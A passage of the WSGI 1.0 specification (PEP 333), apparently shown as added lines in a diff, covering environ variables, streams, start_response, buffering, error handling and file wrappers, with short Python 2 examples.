Variables corresponding to the client-supplied HTTP request headers +(i.e., variables whose names begin with "HTTP_"). The presence or +absence of these variables should correspond with the presence or +absence of the appropriate HTTP header in the request.
+
+

A server or gateway should attempt to provide as many other CGI +variables as are applicable. In addition, if SSL is in use, the server +or gateway should also provide as many of the Apache SSL environment +variables [3] as are applicable, such as HTTPS=on and +SSL_PROTOCOL. Note, however, that an application that uses any CGI +variables other than the ones listed above are necessarily non-portable +to web servers that do not support the relevant extensions. (For +example, web servers that do not publish files will not be able to +provide a meaningful DOCUMENT_ROOT or PATH_TRANSLATED.)

+

A WSGI-compliant server or gateway should document what variables +it provides, along with their definitions as appropriate. Applications +should check for the presence of any variables they require, and +have a fallback plan in the event such a variable is absent.

+

Note: missing variables (such as REMOTE_USER when no +authentication has occurred) should be left out of the environ +dictionary. Also note that CGI-defined variables must be strings, +if they are present at all. It is a violation of this specification +for a CGI variable’s value to be of any type other than str.

+

In addition to the CGI-defined variables, the environ dictionary +may also contain arbitrary operating-system “environment variables”, +and must contain the following WSGI-defined variables:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
VariableValue
wsgi.versionThe tuple (1, 0), representing WSGI +version 1.0.
wsgi.url_schemeA string representing the “scheme” portion of +the URL at which the application is being +invoked. Normally, this will have the value +"http" or "https", as appropriate.
wsgi.inputAn input stream (file-like object) from which +the HTTP request body can be read. (The server +or gateway may perform reads on-demand as +requested by the application, or it may +pre-read the client’s request body and buffer +it in-memory or on disk, or use any other +technique for providing such an input stream, +according to its preference.)
wsgi.errorsAn output stream (file-like object) to which +error output can be written, for the purpose of +recording program or other errors in a +standardized and possibly centralized location. +This should be a “text mode” stream; i.e., +applications should use "\n" as a line +ending, and assume that it will be converted to +the correct line ending by the server/gateway.

For many servers, wsgi.errors will be the +server’s main error log. Alternatively, this +may be sys.stderr, or a log file of some +sort. The server’s documentation should +include an explanation of how to configure this +or where to find the recorded output. A server +or gateway may supply different error streams +to different applications, if this is desired.

+
wsgi.multithreadThis value should evaluate true if the +application object may be simultaneously +invoked by another thread in the same process, +and should evaluate false otherwise.
wsgi.multiprocessThis value should evaluate true if an +equivalent application object may be +simultaneously invoked by another process, +and should evaluate false otherwise.
wsgi.run_onceThis value should evaluate true if the server +or gateway expects (but does not guarantee!) +that the application will only be invoked this +one time during the life of its containing +process. Normally, this will only be true for +a gateway based on CGI (or something similar).
+

Finally, the environ dictionary may also contain server-defined +variables. These variables should be named using only lower-case +letters, numbers, dots, and underscores, and should be prefixed with +a name that is unique to the defining server or gateway. For +example, mod_python might define variables with names like +mod_python.some_variable.

+
+

Input and Error Streams

+

The input and error streams provided by the server must support +the following methods:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
MethodStreamNotes
read(size)input1
readline()input1, 2
readlines(hint)input1, 3
__iter__()input
flush()errors4
write(str)errors
writelines(seq)errors
+

The semantics of each method are as documented in the Python Library +Reference, except for these notes as listed in the table above:

+
    +
  1. The server is not required to read past the client’s specified +Content-Length, and is allowed to simulate an end-of-file +condition if the application attempts to read past that point. +The application should not attempt to read more data than is +specified by the CONTENT_LENGTH variable.
  2. +
  3. The optional “size” argument to readline() is not supported, +as it may be complex for server authors to implement, and is not +often used in practice.
  4. +
  5. Note that the hint argument to readlines() is optional for +both caller and implementer. The application is free not to +supply it, and the server or gateway is free to ignore it.
  6. +
  7. Since the errors stream may not be rewound, servers and gateways +are free to forward write operations immediately, without buffering. +In this case, the flush() method may be a no-op. Portable +applications, however, cannot assume that output is unbuffered +or that flush() is a no-op. They must call flush() if +they need to ensure that output has in fact been written. (For +example, to minimize intermingling of data from multiple processes +writing to the same error log.)
  8. +
+

The methods listed in the table above must be supported by all +servers conforming to this specification. Applications conforming +to this specification must not use any other methods or attributes +of the input or errors objects. In particular, applications +must not attempt to close these streams, even if they possess +close() methods.

+
+
+
+

The start_response() Callable

+

The second parameter passed to the application object is a callable +of the form start_response(status, response_headers, exc_info=None). +(As with all WSGI callables, the arguments must be supplied +positionally, not by keyword.) The start_response callable is +used to begin the HTTP response, and it must return a +write(body_data) callable (see the Buffering and Streaming +section, below).

+

The status argument is an HTTP “status” string like "200 OK" +or "404 Not Found". That is, it is a string consisting of a +Status-Code and a Reason-Phrase, in that order and separated by a +single space, with no surrounding whitespace or other characters. +(See RFC 2616, Section 6.1.1 for more information.) The string +must not contain control characters, and must not be terminated +with a carriage return, linefeed, or combination thereof.

+

The response_headers argument is a list of (header_name, +header_value) tuples. It must be a Python list; i.e. +type(response_headers) is ListType, and the server may change +its contents in any way it desires. Each header_name must be a +valid HTTP header field-name (as defined by RFC 2616, Section 4.2), +without a trailing colon or other punctuation.

+

Each header_value must not include any control characters, +including carriage returns or linefeeds, either embedded or at the end. +(These requirements are to minimize the complexity of any parsing that +must be performed by servers, gateways, and intermediate response +processors that need to inspect or modify response headers.)

+

In general, the server or gateway is responsible for ensuring that +correct headers are sent to the client: if the application omits +a header required by HTTP (or other relevant specifications that are in +effect), the server or gateway must add it. For example, the HTTP +Date: and Server: headers would normally be supplied by the +server or gateway.

+

(A reminder for server/gateway authors: HTTP header names are +case-insensitive, so be sure to take that into consideration when +examining application-supplied headers!)

+

Applications and middleware are forbidden from using HTTP/1.1 +“hop-by-hop” features or headers, any equivalent features in HTTP/1.0, +or any headers that would affect the persistence of the client’s +connection to the web server. These features are the +exclusive province of the actual web server, and a server or gateway +should consider it a fatal error for an application to attempt +sending them, and raise an error if they are supplied to +start_response(). (For more specifics on “hop-by-hop” features and +headers, please see the Other HTTP Features section below.)

+

The start_response callable must not actually transmit the +response headers. Instead, it must store them for the server or +gateway to transmit only after the first iteration of the +application return value that yields a non-empty string, or upon +the application’s first invocation of the write() callable. In +other words, response headers must not be sent until there is actual +body data available, or until the application’s returned iterable is +exhausted. (The only possible exception to this rule is if the +response headers explicitly include a Content-Length of zero.)

+

This delaying of response header transmission is to ensure that buffered +and asynchronous applications can replace their originally intended +output with error output, up until the last possible moment. For +example, the application may need to change the response status from +“200 OK” to “500 Internal Error”, if an error occurs while the body is +being generated within an application buffer.

+

The exc_info argument, if supplied, must be a Python +sys.exc_info() tuple. This argument should be supplied by the +application only if start_response is being called by an error +handler. If exc_info is supplied, and no HTTP headers have been +output yet, start_response should replace the currently-stored +HTTP response headers with the newly-supplied ones, thus allowing the +application to “change its mind” about the output when an error has +occurred.

+

However, if exc_info is provided, and the HTTP headers have already +been sent, start_response must raise an error, and should +raise the exc_info tuple. That is:

+
raise exc_info[0], exc_info[1], exc_info[2]
+
+
+

This will re-raise the exception trapped by the application, and in +principle should abort the application. (It is not safe for the +application to attempt error output to the browser once the HTTP +headers have already been sent.) The application must not trap +any exceptions raised by start_response, if it called +start_response with exc_info. Instead, it should allow +such exceptions to propagate back to the server or gateway. See +Error Handling below, for more details.

+

The application may call start_response more than once, if and +only if the exc_info argument is provided. More precisely, it is +a fatal error to call start_response without the exc_info +argument if start_response has already been called within the +current invocation of the application. (See the example CGI +gateway above for an illustration of the correct logic.)

+

Note: servers, gateways, or middleware implementing start_response +should ensure that no reference is held to the exc_info +parameter beyond the duration of the function’s execution, to avoid +creating a circular reference through the traceback and frames +involved. The simplest way to do this is something like:

+
def start_response(status, response_headers, exc_info=None):
+    if exc_info:
+         try:
+             # do stuff w/exc_info here
+         finally:
+             exc_info = None    # Avoid circular ref.
+
+
+

The example CGI gateway provides another illustration of this +technique.

+
+

Handling the Content-Length Header

+

If the application does not supply a Content-Length header, a +server or gateway may choose one of several approaches to handling +it. The simplest of these is to close the client connection when +the response is completed.

+

Under some circumstances, however, the server or gateway may be +able to either generate a Content-Length header, or at least +avoid the need to close the client connection. If the application +does not call the write() callable, and returns an iterable +whose len() is 1, then the server can automatically determine +Content-Length by taking the length of the first string yielded +by the iterable.

+

And, if the server and client both support HTTP/1.1 +“chunked encoding”, +then the server may use chunked encoding to send +a chunk for each write() call or string yielded by the iterable, +thus generating a Content-Length header for each chunk. This +allows the server to keep the client connection alive, if it wishes +to do so. Note that the server must comply fully with RFC 2616 +when doing this, or else fall back to one of the other strategies for +dealing with the absence of Content-Length.

+

(Note: applications and middleware must not apply any kind of +Transfer-Encoding to their output, such as chunking or gzipping; +as “hop-by-hop” operations, these encodings are the province of the +actual web server/gateway. See Other HTTP Features below, for +more details.)

+
+
+
+

Buffering and Streaming

+

Generally speaking, applications will achieve the best throughput +by buffering their (modestly-sized) output and sending it all at +once. This is a common approach in existing frameworks such as +Zope: the output is buffered in a StringIO or similar object, then +transmitted all at once, along with the response headers.

+

The corresponding approach in WSGI is for the application to simply +return a single-element iterable (such as a list) containing the +response body as a single string. This is the recommended approach +for the vast majority of application functions, that render +HTML pages whose text easily fits in memory.

+

For large files, however, or for specialized uses of HTTP streaming +(such as multipart “server push”), an application may need to provide +output in smaller blocks (e.g. to avoid loading a large file into +memory). It’s also sometimes the case that part of a response may +be time-consuming to produce, but it would be useful to send ahead the +portion of the response that precedes it.

+

In these cases, applications will usually return an iterator (often +a generator-iterator) that produces the output in a block-by-block +fashion. These blocks may be broken to coincide with multipart +boundaries (for “server push”), or just before time-consuming +tasks (such as reading another block of an on-disk file).

+

WSGI servers, gateways, and middleware must not delay the +transmission of any block; they must either fully transmit +the block to the client, or guarantee that they will continue +transmission even while the application is producing its next block. +A server/gateway or middleware may provide this guarantee in one of +three ways:

+
    +
  1. Send the entire block to the operating system (and request +that any O/S buffers be flushed) before returning control +to the application, OR
  2. +
  3. Use a different thread to ensure that the block continues +to be transmitted while the application produces the next +block.
  4. +
  5. (Middleware only) send the entire block to its parent +gateway/server
  6. +
+

By providing this guarantee, WSGI allows applications to ensure +that transmission will not become stalled at an arbitrary point +in their output data. This is critical for proper functioning +of e.g. multipart “server push” streaming, where data between +multipart boundaries should be transmitted in full to the client.

+
+

Middleware Handling of Block Boundaries

+

In order to better support asynchronous applications and servers, +middleware components must not block iteration waiting for +multiple values from an application iterable. If the middleware +needs to accumulate more data from the application before it can +produce any output, it must yield an empty string.

+

To put this requirement another way, a middleware component must +yield at least one value each time its underlying application +yields a value. If the middleware cannot yield any other value, +it must yield an empty string.

+

This requirement ensures that asynchronous applications and servers +can conspire to reduce the number of threads that are required +to run a given number of application instances simultaneously.

+

Note also that this requirement means that middleware must +return an iterable as soon as its underlying application returns +an iterable. It is also forbidden for middleware to use the +write() callable to transmit data that is yielded by an +underlying application. Middleware may only use their parent +server’s write() callable to transmit data that the +underlying application sent using a middleware-provided write() +callable.

+
+
+

The write() Callable

+

Some existing application framework APIs support unbuffered +output in a different manner than WSGI. Specifically, they +provide a “write” function or method of some kind to write +an unbuffered block of data, or else they provide a buffered +“write” function and a “flush” mechanism to flush the buffer.

+

Unfortunately, such APIs cannot be implemented in terms of +WSGI’s “iterable” application return value, unless threads +or other special mechanisms are used.

+

Therefore, to allow these frameworks to continue using an +imperative API, WSGI includes a special write() callable, +returned by the start_response callable.

+

New WSGI applications and frameworks should not use the +write() callable if it is possible to avoid doing so. The +write() callable is strictly a hack to support imperative +streaming APIs. In general, applications should produce their +output via their returned iterable, as this makes it possible +for web servers to interleave other tasks in the same Python thread, +potentially providing better throughput for the server as a whole.

+

The write() callable is returned by the start_response() +callable, and it accepts a single parameter: a string to be +written as part of the HTTP response body, that is treated exactly +as though it had been yielded by the output iterable. In other +words, before write() returns, it must guarantee that the +passed-in string was either completely sent to the client, or +that it is buffered for transmission while the application +proceeds onward.

+

An application must return an iterable object, even if it +uses write() to produce all or part of its response body. +The returned iterable may be empty (i.e. yield no non-empty +strings), but if it does yield non-empty strings, that output +must be treated normally by the server or gateway (i.e., it must be +sent or queued immediately). Applications must not invoke +write() from within their return iterable, and therefore any +strings yielded by the iterable are transmitted after all strings +passed to write() have been sent to the client.

+
+
+
+

Unicode Issues

+

HTTP does not directly support Unicode, and neither does this +interface. All encoding/decoding must be handled by the application; +all strings passed to or from the server must be standard Python byte +strings, not Unicode objects. The result of using a Unicode object +where a string object is required, is undefined.

+

Note also that strings passed to start_response() as a status or +as response headers must follow RFC 2616 with respect to encoding. +That is, they must either be ISO-8859-1 characters, or use RFC 2047 +MIME encoding.

+

On Python platforms where the str or StringType type is in +fact Unicode-based (e.g. Jython, IronPython, Python 3000, etc.), all +“strings” referred to in this specification must contain only +code points representable in ISO-8859-1 encoding (\u0000 through +\u00FF, inclusive). It is a fatal error for an application to +supply strings containing any other Unicode character or code point. +Similarly, servers and gateways must not supply +strings to an application containing any other Unicode characters.

+

Again, all strings referred to in this specification must be +of type str or StringType, and must not be of type +unicode or UnicodeType. And, even if a given platform allows +for more than 8 bits per character in str/StringType objects, +only the lower 8 bits may be used, for any value referred to in +this specification as a “string”.

+
+
+

Error Handling

+

In general, applications should try to trap their own, internal +errors, and display a helpful message in the browser. (It is up +to the application to decide what “helpful” means in this context.)

+

However, to display such a message, the application must not have +actually sent any data to the browser yet, or else it risks corrupting +the response. WSGI therefore provides a mechanism to either allow the +application to send its error message, or be automatically aborted: +the exc_info argument to start_response. Here is an example +of its use:

+
try:
+    # regular application code here
+    status = "200 Froody"
+    response_headers = [("content-type", "text/plain")]
+    start_response(status, response_headers)
+    return ["normal body goes here"]
+except:
+    # XXX should trap runtime issues like MemoryError, KeyboardInterrupt
+    #     in a separate handler before this bare 'except:'...
+    status = "500 Oops"
+    response_headers = [("content-type", "text/plain")]
+    start_response(status, response_headers, sys.exc_info())
+    return ["error body goes here"]
+
+
+

If no output has been written when an exception occurs, the call to +start_response will return normally, and the application will +return an error body to be sent to the browser. However, if any output +has already been sent to the browser, start_response will reraise +the provided exception. This exception should not be trapped by +the application, and so the application will abort. The server or +gateway can then trap this (fatal) exception and abort the response.

+

Servers should trap and log any exception that aborts an +application or the iteration of its return value. If a partial +response has already been written to the browser when an application +error occurs, the server or gateway may attempt to add an error +message to the output, if the already-sent headers indicate a +text/* content type that the server knows how to modify cleanly.

+

Some middleware may wish to provide additional exception handling +services, or intercept and replace application error messages. In +such cases, middleware may choose to not re-raise the exc_info +supplied to start_response, but instead raise a middleware-specific +exception, or simply return without an exception after storing the +supplied arguments. This will then cause the application to return +its error body iterable (or invoke write()), allowing the middleware +to capture and modify the error output. These techniques will work as +long as application authors:

+
    +
  1. Always provide exc_info when beginning an error response
  2. +
  3. Never trap errors raised by start_response when exc_info is +being provided
  4. +
+
+
+

HTTP 1.1 Expect/Continue

+

Servers and gateways that implement HTTP 1.1 must provide +transparent support for HTTP 1.1’s “expect/continue” mechanism. This +may be done in any of several ways:

+
    +
  1. Respond to requests containing an Expect: 100-continue request +with an immediate “100 Continue” response, and proceed normally.
  2. +
  3. Proceed with the request normally, but provide the application +with a wsgi.input stream that will send the “100 Continue” +response if/when the application first attempts to read from the +input stream. The read request must then remain blocked until the +client responds.
  4. +
  5. Wait until the client decides that the server does not support +expect/continue, and sends the request body on its own. (This +is suboptimal, and is not recommended.)
  6. +
+

Note that these behavior restrictions do not apply for HTTP 1.0 +requests, or for requests that are not directed to an application +object. For more information on HTTP 1.1 Expect/Continue, see +RFC 2616, sections 8.2.3 and 10.1.1.

+
+
+

Other HTTP Features

+

In general, servers and gateways should “play dumb” and allow the +application complete control over its output. They should only make +changes that do not alter the effective semantics of the application’s +response. It is always possible for the application developer to add +middleware components to supply additional features, so server/gateway +developers should be conservative in their implementation. In a sense, +a server should consider itself to be like an HTTP “gateway server”, +with the application being an HTTP “origin server”. (See RFC 2616, +section 1.3, for the definition of these terms.)

+

However, because WSGI servers and applications do not communicate via +HTTP, what RFC 2616 calls “hop-by-hop” headers do not apply to WSGI +internal communications. WSGI applications must not generate any +“hop-by-hop” headers, +attempt to use HTTP features that would +require them to generate such headers, or rely on the content of +any incoming “hop-by-hop” headers in the environ dictionary. +WSGI servers must handle any supported inbound “hop-by-hop” headers +on their own, such as by decoding any inbound Transfer-Encoding, +including chunked encoding if applicable.

+

Applying these principles to a variety of HTTP features, it should be +clear that a server may handle cache validation via the +If-None-Match and If-Modified-Since request headers and the +Last-Modified and ETag response headers. However, it is +not required to do this, and the application should perform its +own cache validation if it wants to support that feature, since +the server/gateway is not required to do such validation.

+

Similarly, a server may re-encode or transport-encode an +application’s response, but the application should use a +suitable content encoding on its own, and must not apply a +transport encoding. A server may transmit byte ranges of the +application’s response if requested by the client, and the +application doesn’t natively support byte ranges. Again, however, +the application should perform this function on its own if desired.

+

Note that these restrictions on applications do not necessarily mean +that every application must reimplement every HTTP feature; many HTTP +features can be partially or fully implemented by middleware +components, thus freeing both server and application authors from +implementing the same features over and over again.

+
+
+

Thread Support

+

Thread support, or lack thereof, is also server-dependent. +Servers that can run multiple requests in parallel, should also +provide the option of running an application in a single-threaded +fashion, so that applications or frameworks that are not thread-safe +may still be used with that server.

+
+
+
+

Implementation/Application Notes

+
+

Server Extension APIs

+

Some server authors may wish to expose more advanced APIs, that +application or framework authors can use for specialized purposes. +For example, a gateway based on mod_python might wish to expose +part of the Apache API as a WSGI extension.

+

In the simplest case, this requires nothing more than defining an +environ variable, such as mod_python.some_api. But, in many +cases, the possible presence of middleware can make this difficult. +For example, an API that offers access to the same HTTP headers that +are found in environ variables, might return different data if +environ has been modified by middleware.

+

In general, any extension API that duplicates, supplants, or bypasses +some portion of WSGI functionality runs the risk of being incompatible +with middleware components. Server/gateway developers should not +assume that nobody will use middleware, because some framework +developers specifically intend to organize or reorganize their +frameworks to function almost entirely as middleware of various kinds.

+

So, to provide maximum compatibility, servers and gateways that +provide extension APIs that replace some WSGI functionality, must +design those APIs so that they are invoked using the portion of the +API that they replace. For example, an extension API to access HTTP +request headers must require the application to pass in its current +environ, so that the server/gateway may verify that HTTP headers +accessible via the API have not been altered by middleware. If the +extension API cannot guarantee that it will always agree with +environ about the contents of HTTP headers, it must refuse service +to the application, e.g. by raising an error, returning None +instead of a header collection, or whatever is appropriate to the API.

+

Similarly, if an extension API provides an alternate means of writing +response data or headers, it should require the start_response +callable to be passed in, before the application can obtain the +extended service. If the object passed in is not the same one that +the server/gateway originally supplied to the application, it cannot +guarantee correct operation and must refuse to provide the extended +service to the application.

+

These guidelines also apply to middleware that adds information such +as parsed cookies, form variables, sessions, and the like to +environ. Specifically, such middleware should provide these +features as functions which operate on environ, rather than simply +stuffing values into environ. This helps ensure that information +is calculated from environ after any middleware has done any URL +rewrites or other environ modifications.

+

It is very important that these “safe extension” rules be followed by +both server/gateway and middleware developers, in order to avoid a +future in which middleware developers are forced to delete any and all +extension APIs from environ to ensure that their mediation isn’t +being bypassed by applications using those extensions!

+
+
+

Application Configuration

+

This specification does not define how a server selects or obtains an +application to invoke. These and other configuration options are +highly server-specific matters. It is expected that server/gateway +authors will document how to configure the server to execute a +particular application object, and with what options (such as +threading options).

+

Framework authors, on the other hand, should document how to create an +application object that wraps their framework’s functionality. The +user, who has chosen both the server and the application framework, +must connect the two together. However, since both the framework and +the server now have a common interface, this should be merely a +mechanical matter, rather than a significant engineering effort for +each new server/framework pair.

+

Finally, some applications, frameworks, and middleware may wish to +use the environ dictionary to receive simple string configuration +options. Servers and gateways should support this by allowing +an application’s deployer to specify name-value pairs to be placed in +environ. In the simplest case, this support can consist merely of +copying all operating system-supplied environment variables from +os.environ into the environ dictionary, since the deployer in +principle can configure these externally to the server, or in the +CGI case they may be able to be set via the server’s configuration +files.

+

Applications should try to keep such required variables to a +minimum, since not all servers will support easy configuration of +them. Of course, even in the worst case, persons deploying an +application can create a script to supply the necessary configuration +values:

+
from the_app import application
+
+def new_app(environ, start_response):
+    environ['the_app.configval1'] = 'something'
+    return application(environ, start_response)
+
+
+

But, most existing applications and frameworks will probably only need +a single configuration value from environ, to indicate the location +of their application or framework-specific configuration file(s). (Of +course, applications should cache such configuration, to avoid having +to re-read it upon each invocation.)

+
+
+

URL Reconstruction

+

If an application wishes to reconstruct a request’s complete URL, it +may do so using the following algorithm, contributed by Ian Bicking:

+
from urllib import quote
+url = environ['wsgi.url_scheme']+'://'
+
+if environ.get('HTTP_HOST'):
+    url += environ['HTTP_HOST']
+else:
+    url += environ['SERVER_NAME']
+
+    if environ['wsgi.url_scheme'] == 'https':
+        if environ['SERVER_PORT'] != '443':
+           url += ':' + environ['SERVER_PORT']
+    else:
+        if environ['SERVER_PORT'] != '80':
+           url += ':' + environ['SERVER_PORT']
+
+url += quote(environ.get('SCRIPT_NAME', ''))
+url += quote(environ.get('PATH_INFO', ''))
+if environ.get('QUERY_STRING'):
+    url += '?' + environ['QUERY_STRING']
+
+
+

Note that such a reconstructed URL may not be precisely the same URI +as requested by the client. Server rewrite rules, for example, may +have modified the client’s originally requested URL to place it in a +canonical form.

+
+
+

Supporting Older (<2.2) Versions of Python

+

Some servers, gateways, or applications may wish to support older +(<2.2) versions of Python. This is especially important if Jython +is a target platform, since as of this writing a production-ready +version of Jython 2.2 is not yet available.

+

For servers and gateways, this is relatively straightforward: +servers and gateways targeting pre-2.2 versions of Python must +simply restrict themselves to using only a standard “for” loop to +iterate over any iterable returned by an application. This is the +only way to ensure source-level compatibility with both the pre-2.2 +iterator protocol (discussed further below) and “today’s” iterator +protocol (see PEP 234).

+

(Note that this technique necessarily applies only to servers, +gateways, or middleware that are written in Python. Discussion of +how to use iterator protocol(s) correctly from other languages is +outside the scope of this PEP.)

+

For applications, supporting pre-2.2 versions of Python is slightly +more complex:

+
    +
  • You may not return a file object and expect it to work as an iterable, +since before Python 2.2, files were not iterable. (In general, you +shouldn’t do this anyway, because it will perform quite poorly most +of the time!) Use wsgi.file_wrapper or an application-specific +file wrapper class. (See Optional Platform-Specific File Handling +for more on wsgi.file_wrapper, and an example class you can use +to wrap a file as an iterable.)
  • +
  • If you return a custom iterable, it must implement the pre-2.2 +iterator protocol. That is, provide a __getitem__ method that +accepts an integer key, and raises IndexError when exhausted. +(Note that built-in sequence types are also acceptable, since they +also implement this protocol.)
  • +
+

Finally, middleware that wishes to support pre-2.2 versions of Python, +and iterates over application return values or itself returns an +iterable (or both), must follow the appropriate recommendations above.

+

(Note: It should go without saying that to support pre-2.2 versions +of Python, any server, gateway, application, or middleware must also +use only language features available in the target version, use +1 and 0 instead of True and False, etc.)

+
+
+

Optional Platform-Specific File Handling

+

Some operating environments provide special high-performance +file-transmission facilities, such as the Unix sendfile() call. +Servers and gateways may expose this functionality via an optional +wsgi.file_wrapper key in the environ. An application +may use this “file wrapper” to convert a file or file-like object +into an iterable that it then returns, e.g.:

+
if 'wsgi.file_wrapper' in environ:
+    return environ['wsgi.file_wrapper'](filelike, block_size)
+else:
+    return iter(lambda: filelike.read(block_size), '')
+
+
+

If the server or gateway supplies wsgi.file_wrapper, it must be +a callable that accepts one required positional parameter, and one +optional positional parameter. The first parameter is the file-like +object to be sent, and the second parameter is an optional block +size “suggestion” (which the server/gateway need not use). The +callable must return an iterable object, and must not perform +any data transmission until and unless the server/gateway actually +receives the iterable as a return value from the application. +(To do otherwise would prevent middleware from being able to interpret +or override the response data.)

+

To be considered “file-like”, the object supplied by the application +must have a read() method that takes an optional size argument. +It may have a close() method, and if so, the iterable returned +by wsgi.file_wrapper must have a close() method that +invokes the original file-like object’s close() method. If the +“file-like” object has any other methods or attributes with names +matching those of Python built-in file objects (e.g. fileno()), +the wsgi.file_wrapper may assume that these methods or +attributes have the same semantics as those of a built-in file object.

+

The actual implementation of any platform-specific file handling +must occur after the application returns, and the server or +gateway checks to see if a wrapper object was returned. (Again, +because of the presence of middleware, error handlers, and the like, +it is not guaranteed that any wrapper created will actually be used.)

+

Apart from the handling of close(), the semantics of returning a +file wrapper from the application should be the same as if the +application had returned iter(filelike.read, ''). In other words, +transmission should begin at the current position within the “file” +at the time that transmission begins, and continue until the end is +reached.

+

Of course, platform-specific file transmission APIs don’t usually +accept arbitrary “file-like” objects. Therefore, a +wsgi.file_wrapper has to introspect the supplied object for +things such as a fileno() (Unix-like OSes) or a +java.nio.FileChannel (under Jython) in order to determine if +the file-like object is suitable for use with the platform-specific +API it supports.

+

Note that even if the object is not suitable for the platform API, +the wsgi.file_wrapper must still return an iterable that wraps +read() and close(), so that applications using file wrappers +are portable across platforms. Here’s a simple platform-agnostic +file wrapper class, suitable for old (pre 2.2) and new Pythons alike:

+
class FileWrapper:
+
+    def __init__(self, filelike, blksize=8192):
+        self.filelike = filelike
+        self.blksize = blksize
+        if hasattr(filelike, 'close'):
+            self.close = filelike.close
+
+    def __getitem__(self, key):
+        data = self.filelike.read(self.blksize)
+        if data:
+            return data
+        raise IndexError
+
+
+

and here is a snippet from a server/gateway that uses it to provide +access to a platform-specific API:

+
environ['wsgi.file_wrapper'] = FileWrapper
+result = application(environ, start_response)
+
+try:
+    if isinstance(result, FileWrapper):
+        # check if result.filelike is usable w/platform-specific
+        # API, and if so, use that API to transmit the result.
+        # If not, fall through to normal iterable handling
+        # loop below.
+
+    for data in result:
+        # etc.
+
+finally:
+    if hasattr(result, 'close'):
+        result.close()
+
+
+
+
+
+

Questions and Answers

+
    +
  1. Why must environ be a dictionary? What’s wrong with using a +subclass?

    The rationale for requiring a dictionary is to maximize portability +between servers. The alternative would be to define some subset of +a dictionary’s methods as being the standard and portable +interface. In practice, however, most servers will probably find a +dictionary adequate to their needs, and thus framework authors will +come to expect the full set of dictionary features to be available, +since they will be there more often than not. But, if some server +chooses not to use a dictionary, then there will be +interoperability problems despite that server’s “conformance” to +spec. Therefore, making a dictionary mandatory simplifies the +specification and guarantees interoperability.

    +

    Note that this does not prevent server or framework developers from +offering specialized services as custom variables inside the +environ dictionary. This is the recommended approach for +offering any such value-added services.

    +
  2. +
  3. Why can you call write() and yield strings/return an +iterable? Shouldn’t we pick just one way?

    If we supported only the iteration approach, then current +frameworks that assume the availability of “push” suffer. But, if +we only support pushing via write(), then server performance +suffers for transmission of e.g. large files (if a worker thread +can’t begin work on a new request until all of the output has been +sent). Thus, this compromise allows an application framework to +support both approaches, as appropriate, but with only a little +more burden to the server implementor than a push-only approach +would require.

    +
  4. +
  5. What’s the close() for?

    When writes are done during the execution of an application +object, the application can ensure that resources are released +using a try/finally block. But, if the application returns an +iterable, any resources used will not be released until the +iterable is garbage collected. The close() idiom allows an +application to release critical resources at the end of a request, +and it’s forward-compatible with the support for try/finally in +generators that’s proposed by PEP 325.

    +
  6. +
  7. Why is this interface so low-level? I want feature X! (e.g. +cookies, sessions, persistence, …)

    This isn’t Yet Another Python Web Framework. It’s just a way for +frameworks to talk to web servers, and vice versa. If you want +these features, you need to pick a web framework that provides the +features you want. And if that framework lets you create a WSGI +application, you should be able to run it in most WSGI-supporting +servers. Also, some WSGI servers may offer additional services via +objects provided in their environ dictionary; see the +applicable server documentation for details. (Of course, +applications that use such extensions will not be portable to other +WSGI-based servers.)

    +
  8. +
  9. Why use CGI variables instead of good old HTTP headers? And why +mix them in with WSGI-defined variables?

    Many existing web frameworks are built heavily upon the CGI spec, +and existing web servers know how to generate CGI variables. In +contrast, alternative ways of representing inbound HTTP information +are fragmented and lack market share. Thus, using the CGI +“standard” seems like a good way to leverage existing +implementations. As for mixing them with WSGI variables, +separating them would just require two dictionary arguments to be +passed around, while providing no real benefits.

    +
  10. +
  11. What about the status string? Can’t we just use the number, +passing in 200 instead of "200 OK"?

    Doing this would complicate the server or gateway, by requiring +them to have a table of numeric statuses and corresponding +messages. By contrast, it is easy for an application or framework +author to type the extra text to go with the specific response code +they are using, and existing frameworks often already have a table +containing the needed messages. So, on balance it seems better to +make the application/framework responsible, rather than the server +or gateway.

    +
  12. +
  13. Why is wsgi.run_once not guaranteed to run the app only once?

    Because it’s merely a suggestion to the application that it should +“rig for infrequent running”. This is intended for application +frameworks that have multiple modes of operation for caching, +sessions, and so forth. In a “multiple run” mode, such frameworks +may preload caches, and may not write e.g. logs or session data to +disk after each request. In “single run” mode, such frameworks +avoid preloading and flush all necessary writes after each request.

    +

    However, in order to test an application or framework to verify +correct operation in the latter mode, it may be necessary (or at +least expedient) to invoke it more than once. Therefore, an +application should not assume that it will definitely not be run +again, just because it is called with wsgi.run_once set to +True.

    +
  14. +
  15. Feature X (dictionaries, callables, etc.) are ugly for use in +application code; why don’t we use objects instead?

    All of these implementation choices of WSGI are specifically +intended to decouple features from one another; recombining these +features into encapsulated objects makes it somewhat harder to +write servers or gateways, and an order of magnitude harder to +write middleware that replaces or modifies only small portions of +the overall functionality.

    +

    In essence, middleware wants to have a “Chain of Responsibility” +pattern, whereby it can act as a “handler” for some functions, +while allowing others to remain unchanged. This is difficult to do +with ordinary Python objects, if the interface is to remain +extensible. For example, one must use __getattr__ or +__getattribute__ overrides, to ensure that extensions (such as +attributes defined by future WSGI versions) are passed through.

    +

    This type of code is notoriously difficult to get 100% correct, and +few people will want to write it themselves. They will therefore +copy other people’s implementations, but fail to update them when +the person they copied from corrects yet another corner case.

    +

    Further, this necessary boilerplate would be pure excise, a +developer tax paid by middleware developers to support a slightly +prettier API for application framework developers. But, +application framework developers will typically only be updating +one framework to support WSGI, and in a very limited part of +their framework as a whole. It will likely be their first (and +maybe their only) WSGI implementation, and thus they will likely +implement with this specification ready to hand. Thus, the effort +of making the API “prettier” with object attributes and suchlike +would likely be wasted for this audience.

    +

    We encourage those who want a prettier (or otherwise improved) WSGI +interface for use in direct web application programming (as opposed +to web framework development) to develop APIs or frameworks that +wrap WSGI for convenient use by application developers. In this +way, WSGI can remain conveniently low-level for server and +middleware authors, while not being “ugly” for application +developers.

    +
  16. +
+
+
+

Proposed/Under Discussion

+

These items are currently being discussed on the Web-SIG and elsewhere, +or are on the PEP author’s “to-do” list:

+
    +
  • Should wsgi.input be an iterator instead of a file? This would +help for asynchronous applications and chunked-encoding input +streams.
  • +
  • Optional extensions are being discussed for pausing iteration of an +application’s output until input is available or until a callback +occurs.
  • +
  • Add a section about synchronous vs. asynchronous apps and servers, +the relevant threading models, and issues/design goals in these +areas.
  • +
+
+
+

Acknowledgements

+

